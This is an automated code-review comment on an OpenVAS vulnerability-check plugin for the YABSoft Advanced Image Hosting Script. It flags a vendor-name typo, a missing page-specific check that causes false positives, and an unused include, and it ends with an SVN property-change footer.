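Review bot: `script_summary` at L838 names the vendor as "ABSoft" while the title, `script_name` and description all say "YABSoft"; it should be `script_summary("Determine if installed YABSoft Advanced Image Hosting Script is vulnerable");`. The check at L863 passes `check_header:TRUE` but no `extra_check:`, so any page under `/images` or a cgi_dirs() entry that reflects the query string will be reported; anchoring on a string specific to the report.php page (placeholder: `extra_check:"<AIHS_PAGE_MARKER>"`, to be confirmed) would cut false positives. `include("host_details.inc")` at L849 is unused.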


Property changes on: trunk/openvas-plugins/scripts/gb_yabsoft_image_hosting_script_49457.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision


